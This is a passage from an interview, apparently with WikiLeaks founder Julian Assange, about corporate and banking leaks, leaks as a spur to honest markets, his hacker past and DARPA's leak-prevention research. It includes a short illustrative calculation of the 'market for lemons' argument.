A. One example: It began with something we released last year, quite an interesting case that wasn’t really picked up by anyone. There’s a Texas-Canadian oil company whose name escapes me. They had these wells in Albania that had been blowing. Quite serious. We got this report from a consultant engineer into what was happening, saying vans were turning up in the middle of the night and doing something to them. They were being sabotaged. The Albanian government was involved with another company; there were two rival producers, one government-owned and the other privately owned. So when we got this report, it didn’t have a header. It didn’t say the name of the firm, or even who the wells belonged to.

Q. So it wasn’t picked up because it was missing key data.
A. At the time, yeah. So I said, what the hell do we do with this thing? It’s impossible to verify if we don’t even know who it came from. It could have been one company trying to frame the other one. So we did something very unusual, and published it and said “We’ve got this thing, looks like it could have been written by a rival company aiming to defame the other, but we can’t verify it. We want more information.” Whether it’s a fake document or real one, something was going on. Either one company is trying to frame the other, which is interesting, or it’s true, which is also very interesting. That’s where the matter sat until we got a letter of inquiry from an engineering consulting company asking how to get rid of it. We demanded that they first prove that they were the owner.

Q. It sounds like when Apple confirmed that the lost iPhone 4 was real, by demanding that Gizmodo return it.
A. Yes, like Apple and the iPhone. They sent us a screen capture with the missing header and other information.

Q. What were they thinking?
A. I don’t know.

Q. So the full publication is coming up?
A. Yes.

Q. Do you have more on finance?
A. We have a lot of finance related things. Of the commercial sectors we’ve covered, finance is the most significant. Before the banks went bust in Dubai, we put out a number of leaks showing they were unhealthy. They threatened to send us to prison in Dubai, which is a little serious, if we went there.

Q. Just to review, what would you say are the biggest five private sector leaks in WikiLeaks’ history?
A. It depends on the importance of the material vs. the impact. Kaupthing was one of the most important, because of the chain of effects it set off, the scrutiny in Iceland and the rest of Scandinavia. The Bank Julius Baer case was also important. The Kaupthing leak was a very good leak. The loan book described in very frank terms the creditworthiness of all these big companies and billionaires and borrowers, not just internal to the bank but across a broad spectrum all over the world, an assessment of a whole bunch of businesses around the world. It was quite an interesting leak. It didn’t just expose Kaupthing, it exposed many companies. The Bank Julius Baer leak exposed high-net-worth individuals hiding assets in the Cayman Islands, and we went on to do a series that exposed the bank’s own internal tax structure. It’s interesting that Swiss banks also hide their assets from the Swiss by using offshore bank structuring. We had some quite good stuff in there. It set off a chain of regulatory investigations, possibly resulting in some changes. It triggered a lot of interesting scrutiny.

Q. Regulation: Is that what you’re after?
A. I’m not a big fan of regulation: anyone who likes freedom of the press can’t be. But there are some abuses that should be regulated, and this is one. With regard to these corporate leaks, I should say: There’s an overlap between corporate and government leaks. When we released the Kroll report on three to four billion smuggled out by the former Kenyan president Daniel arap Moi and his cronies, where did the money go? There’s no megacorruption–as they call it in Africa, it’s a bit sensational but you’re talking about billions–without support from Western banks and companies. That money went into London properties, Swiss banks, property in New York, companies that had been set up to move this money. We had another interesting one from the pharmaceutical industry: It was quite self-referential. The lobbyists had been getting leaks from the WHO. They were getting their own internal intelligence report affecting investment regulation. We were leaked a copy. It was a meta-leak. That was quite influential, though it was a relatively small leak–it was published in Nature and other pharma journals.

Q. What do you think WikiLeaks mean for business? How do businesses need to adjust to a world where WikiLeaks exists?
A. WikiLeaks means it’s easier to run a good business and harder to run a bad business, and all CEOs should be encouraged by this. I think about the case in China where milk powder companies started cutting the protein in milk powder with plastics. That happened at a number of separate manufacturers. Let’s say you want to run a good company. It’s nice to have an ethical workplace. Your employees are much less likely to screw you over if they’re not screwing other people over. Then one company starts cutting its milk powder with melamine, and becomes more profitable. You can follow suit, or slowly go bankrupt and be taken over by the one that’s cutting its milk powder. That’s the worst of all possible outcomes. The other possibility is that the first one to cut its milk powder is exposed. Then you don’t have to cut your milk powder. There’s a threat of regulation that produces self-regulation. It just means that it’s easier for honest CEOs to run an honest business, if dishonest businesses are more negatively affected by leaks than honest ones. That’s the whole idea. In the struggle between open and honest companies and dishonest and closed companies, we’re creating a tremendous reputational tax on the unethical companies. No one wants to have their own things leaked. It pains us when we have internal leaks. But across any given industry, it is both good for the whole industry to have those leaks, and it’s especially good for the good players.

Q. But aside from the market as a whole, how should companies change their behavior understanding that leaks will increase?
A. Do things to encourage leaks from dishonest competitors. Be as open and honest as possible. Treat your employees well. I think it’s extremely positive. You end up with a situation where honest companies producing quality products are more competitive than dishonest companies producing bad products. And companies that treat their employees well do better than those that treat them badly.

Q. Would you call yourself a free market proponent?
A. Absolutely. I have mixed attitudes towards capitalism, but I love markets. Having lived and worked in many countries, I can see the tremendous vibrancy in, say, the Malaysian telecom sector compared to the U.S. sector. In the U.S. everything is vertically integrated and sewn up, so you don’t have a free market. In Malaysia, you have a broad spectrum of players, and you can see the benefits for all as a result.

Q. How do your leaks fit into that?
A. To put it simply, in order for there to be a market, there has to be information. A perfect market requires perfect information. There’s the famous lemon example in the used car market. It’s hard for buyers to tell lemons from good cars, and sellers can’t get a good price, even when they have a good car. By making it easier to see where the problems are inside of companies, we identify the lemons. That means there’s a better market for good companies. For a market to be free, people have to know who they’re dealing with.
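The “lemons” argument he is citing can be made concrete with a two-line calculation (the values and the mix of good cars and lemons below are invented for illustration):

good, lemon, share_good = 10_000, 4_000, 0.5   # assumed car values and market mix

blind_offer = share_good * good + (1 - share_good) * lemon
print(blind_offer)   # 7000: less than a good car is worth, so honest sellers
                     # withdraw, the share of lemons rises, and offers fall further

Leaks, on this view, play the role of the mechanic’s inspection: they let buyers tell the lemons apart, which is what keeps good sellers in the market.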

Q. You’ve developed a reputation as anti-establishment and anti-institution.
A. Not at all. Creating a well-run establishment is a difficult thing to do, and I’ve been in countries where institutions are in a state of collapse, so I understand the difficulty of running a company. Institutions don’t come from nowhere. It’s not correct to put me in any one philosophical or economic camp, because I’ve learned from many. But one is American libertarianism, market libertarianism. So as far as markets are concerned I’m a libertarian, but I have enough expertise in politics and history to understand that a free market ends up as a monopoly unless you force markets to be free. WikiLeaks is designed to make capitalism more free and ethical.

Q. But in the meantime, there could be a lot of pain from these scandals, obviously.
A. Pain for the guilty.

Q. Do you derive pleasure from these scandals that you expose and the companies you shame?
A. It’s tremendously satisfying work to see reforms being engaged in and stimulating those reforms. To see opportunists and abusers brought to account.

Q. You were a traditional computer hacker. How did you find this new model of getting information out of companies?
A. It’s a bit annoying, actually. Because I co-wrote a book about [being a hacker], there are documentaries about that, and people talk about it a lot. They can cut and paste. But that was 20 years ago. It’s very annoying to see modern-day articles calling me a computer hacker. I’m not ashamed of it, I’m quite proud of it. But I understand the reason they suggest I’m a computer hacker now. There’s a very specific reason. I started one of the first ISPs in Australia, known as Suburbia, in 1993. Since that time, I’ve been a publisher, and at various moments a journalist. There’s a deliberate attempt to redefine what we’re doing not as publishing, which is protected in many countries, or journalistic activity, which is protected in other ways, but as something which has no protection, like computer hacking, and to thereby split us off from the rest of the press and from those legal protections. It’s done quite deliberately by some of our opponents. It’s also done out of fear, by publishers like The New York Times, that they’ll be regulated and investigated if they include our activities in publishing and journalism.

Q. I’m not arguing you’re a hacker now. But if we say that both what you were doing then and now are both about gaining access to information, when did you change your strategy from going in and getting it to simply asking for it?
A. That hacker mindset was very valuable to me. But the insiders know where the bodies are. It’s much more efficient to have insiders. They know the problems, they understand how to expose them.

Q. How did you start to approach your leak strategy?
A. When we started Suburbia in 1993, I knew that bringing information to the people was very important. We facilitated many groups: we were the electronic printer, if you like, for many companies and individuals who were using us to publish information. They were bringing us information, and some of them were activist groups and lawyers. Some were bringing forward information about companies, like Telstra, the Australian telecommunications giant. We published information on them. That’s something I was doing in the 1990s. We were the free-speech ISP in Australia. An Australian anti-Church of Scientology website was hounded out of Victoria University by legal threats from California, and hounded out of a lot of other places. Eventually they came to us. People were fleeing from ISPs that would fold under legal threats, even from a cult in the U.S. That’s something I saw early on, without realizing it: potentiating people to reveal their information, creating a conduit. Without any other robust publisher in the market, people came to us.

Q. I wanted to ask you about [Peiter Zatko, a legendary hacker and security researcher who also goes by] “Mudge.”
A. Yeah, I know Mudge. He’s a very sharp guy.

Q. Mudge is now leading a project at the Pentagon’s Defense Advanced Research Projects Agency to find a technology that can stop leaks, which seems pretty relevant to your organization. Can you tell me about your past relationship with Mudge?
A. Well, I…no comment.

Q. Were you part of the same scene of hackers? When you were a computer hacker, you must have known him well.
A. We were in the same milieu. I spoke with everyone in that milieu.

Q. What do you think of his current work to prevent digital leaks inside of organizations, a project called Cyber Insider Threat or Cinder?
A. I know nothing about it.

Q. But what do you think of the potential of any technology designed to prevent leaks?
A. Marginal.

Q. What do you mean?
A. New formats and new ways of communicating are constantly cropping up. Stopping leaks is a new form of censorship, and in the same manner that very significant resources have been spent on China’s firewall, the result is that anyone who’s motivated can work around it. Not just a small fraction of users: anyone who really wants to can work around it. Censorship circumvention tools [like the program Tor] also focus on leaks; they facilitate leaking. Airgapped networks, where there’s literally no connection between the network and the internet, are different. You may need a human being to carry something across, but they don’t have to carry it intentionally. It could be a virus on a USB stick, as the Stuxnet worm showed, though that went in the other direction. You could pass the information out via someone who doesn’t know they’re a mule.

Q. Back to Mudge and Cinder: Do you think, knowing his intelligence personally, that he can solve the problem of leaks?
A. No, but that doesn’t mean the difficulty can’t be increased. But I think it’s a very difficult case, and the reason I suggest it’s impossible to solve completely is that most people do not leak, and the various threats and penalties already in place mean that those who do must be highly motivated to face them. Censoring might work for the average person, but not for highly motivated people. And our people are highly motivated. Mudge is a clever guy, and he’s also highly ethical. I suspect he would have concerns about creating a system to conceal genuine abuses.

Q. But his goal of preventing leaks doesn’t differentiate among different types of content. It would stop whistleblowers just as much as it stops exfiltration of data by foreign hackers.
A. I’m sure he’ll tell you China spies on the U.S., Russia, France. There are genuine concerns about those powers exfiltrating data. And it’s possibly ethical to combat that process. But spying is also stabilizing to relationships. Your fears about where a country is or is not are always worse than the reality. If you only have a black box, you can put all your fears into it, particularly opportunists in government or private industry who want to address a problem that may not exist. If you know what a government is doing, that can reduce tensions.

Q. There have been reports that Daniel Domscheit-Berg, a German who used to work with WikiLeaks, has left to create his own WikiLeaks-type organization. The Wall Street Journal described him as a “competitor” to WikiLeaks. Do you see him as competition?
A. The supply of leaks is very large. It’s helpful for us to have more people in this industry. It’s protective to us.

Q. What do you think of the idea of WikiLeaks copycats and spinoffs?
A. There have been a few over time, and they’ve been very dangerous. It’s not something that’s easy to do right. That’s the problem. Recently we saw a Chinese WikiLeaks. We encouraged them to come to us to work with us. It would be nice to have more Chinese speakers working with us in a dedicated way. But what they’d set up had no meaningful security. They have no reputation you can trust. It’s very easy and very dangerous to do it wrong.

Q. Do you think that the Icelandic Modern Media Initiative [a series of bills to make Iceland the most free-speech and whistleblower-protective country in the world] would make it easier to do this right if it passes?
A. Not at the highest level. We deal with organizations that do not obey the rule of law. So laws don’t matter. Intelligence agencies keep things secret because they often violate the rule of law or of good behavior.

Q. What about corporate leaks?
A. For corporate leaks, yes, free speech laws could make things easier. Not for military contractors, because they’re in bed with intelligence agencies. If a spy agency’s involved, IMMI won’t help you. Except it may increase the diplomatic cost a little, if they’re caught. That’s why our primary defense isn’t law, but technology.

Q. Are there any other leaking organizations that you do endorse?
A. No, there are none.

Q. Do you hope that IMMI will foster a new generation of WikiLeaks-type organizations?
A. More than WikiLeaks: general publishing. We’re the canary in the coalmine. We’re at the vanguard. But the attacks against publishers in general are severe.

Q. If you had a wishlist of what industries or governments, what are you looking for from leakers?
A. All governments, all industries. We accept all material of diplomatic, historical or ethical significance that hasn’t been released before and is under active suppression. There’s a question about which industries have the greatest potential for reform. Those may be the ones we haven’t heard about yet. So what’s the big thing around the corner? The real answer is I don’t know. No one in the public knows. But someone on the inside does know.

Q. But there are also industries that just have more secrecy, so you must know there are things you want that you haven’t gotten.
A. That’s right. The intelligence industry is one example. It has a higher level of secrecy. And that’s also true of the banking industry. People in other industries that are extremely well paid, say at Goldman Sachs, might have higher incentives not to lose their jobs. So it’s only the obvious things that we want: things concerning intelligence and war, and mass financial fraud. Because they affect so many people so severely.

Q. And they’re harder leaks to get.
A. Intelligence particularly, because the penalties are so severe. Although very few people have been caught, it’s worth noting. The penalties may be severe, but nearly everyone gets away with it. To keep people in control, you only need to make them scared. The CIA is not scared as an institution of people leaking. It’s scared that people will know that people are leaking and getting away with it. If that happens, the management loses control.

Q. And WikiLeaks has the opposite strategy?
A. That’s right. It’s summed up by the phrase “courage is contagious.” If you demonstrate that individuals can leak something and go on to live a good life, it’s tremendously incentivizing to people.